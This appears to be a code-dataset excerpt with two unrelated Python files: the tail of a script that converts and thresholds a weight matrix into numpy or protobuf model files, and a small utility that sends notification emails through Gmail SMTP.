# get both the weight materices
if not -0.00001 < args.thresh < 100.000001:
raise ValueError("Threshold should be b/w 0 and 1")
weight = np.asarray(matfile['L'].T, dtype='float32')
weight_minfill = np.asarray(matfile['minL'], dtype='float32')
nnz = np.sum(np.abs(weight) > 1e-10)
nnz_minfill = np.sum(np.abs(weight_minfill) > 1e-10)
num_to_delete = int((nnz - nnz_minfill) * args.thresh / 100.)
weight_nnz = np.abs(weight[np.abs(weight)>1e-10])
threshold = np.sort(weight_nnz)[num_to_delete]
weight[np.abs(weight) < threshold] = 0.0
else:
weight = np.asarray(matfile['L'].T, dtype='float32')
nFeats,_ = weight.shape
diag = np.ones([nFeats, 1]) * matfile['min_eig'] * (1+matfile['alpha'])
diag = np.asarray(diag, dtype='float32')
if dump_npy :
if args.edge_input_file:
edge_file = os.path.join(dirpath, args.edge_input_file)
else:
edge_file = os.path.join(dirpath, 'edge_input_to_gaussian.npy')
diag_file = os.path.join(dirpath, 'diag_gaussian.npy')
np.save(edge_file, weight)
np.save(diag_file, diag)
else:
model = util.ReadModel(model_file)
proto_weight = next(param for param in model.edge[0].param if param.name == 'weight')
proto_weight.mat = util.NumpyAsParameter(weight)
proto_weight.dimensions.extend(weight.shape)
input_layer = next(l for l in model.layer if l.name == 'input_layer')
proto_diag = next(param for param in input_layer.param if param.name == 'diag')
proto_diag.mat = util.NumpyAsParameter(diag)
proto_diag.dimensions.extend(diag.shape)
out_file = os.path.join(dirpath, out_file)
f = gzip.open(out_file, 'wb')
f.write(model.SerializeToString())
f.close()
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument("--model_file", type=str)
parser.add_argument("--mat_file", type=str)
parser.add_argument("--out_file", type=str)
parser.add_argument("--edge_input_file", type=str)
parser.add_argument("--dirpath", type=str)
parser.add_argument("--npy", action='store_true')
parser.add_argument("--minfill", action='store_true')
parser.add_argument("--random", action='store_true')
parser.add_argument("--thresh", type=float, help="Threshold L")
args = parser.parse_args()
if args.npy:
Convert(args, args.dirpath, args.mat_file, dump_npy = True)
else:
Convert(args, args.dirpath, args.mat_file, dump_npy = False, out_file = args.out_file, model_file=args.model_file)
|
jaredestroud/AutoMailer | refs/heads/master | AutoMailer.py | 1 | #!/usr/bin/env python
'''
Author: Jared Stroud
Date: January 2016
Purpose: Automate mailing users after events occur.
'''
import random
import smtplib
class emailReqs():
def __init__(self, fromaddress, to, smtpProvider="smtp.gmail.com:587"):
self.fromaddr = fromaddress
self.toaddr = to
self.smtp = smtpProvider # Defaulting to Google.
def messageBody(self, msg, emailSubject):
'''
Name: messageBody
Parameters: msg(string), contents of message to send.
emailSubject(string), The email subject.
Return: (String) which contains subject and message body of email.
'''
message = 'Subject: %s\n\n%s' % (emailSubject, msg)
return message
def emailLogin(self, username, password, message):
'''
Name:emailLogin
Parameters:
username(string): e-mail provider username.
password(string): e-mail provider's password.
message(string): Return value of messageBody.
'''
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username, password)
print ("From: %s \n To: %s\n Message: %s\n" % (self.fromaddr,
self.toaddr,
message))
server.sendmail(self.fromaddr, self.toaddr, message)
server.quit()
if __name__ == "__main__":
userName = ""
emailFrom = ""
emailTo = ""
password = ""
subject = ""
message = "Test_Message"
mailObj = emailReqs(emailFrom, emailTo)
msg = mailObj.messageBody(message, subject)
mailObj.emailLogin(userName, password, msg)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.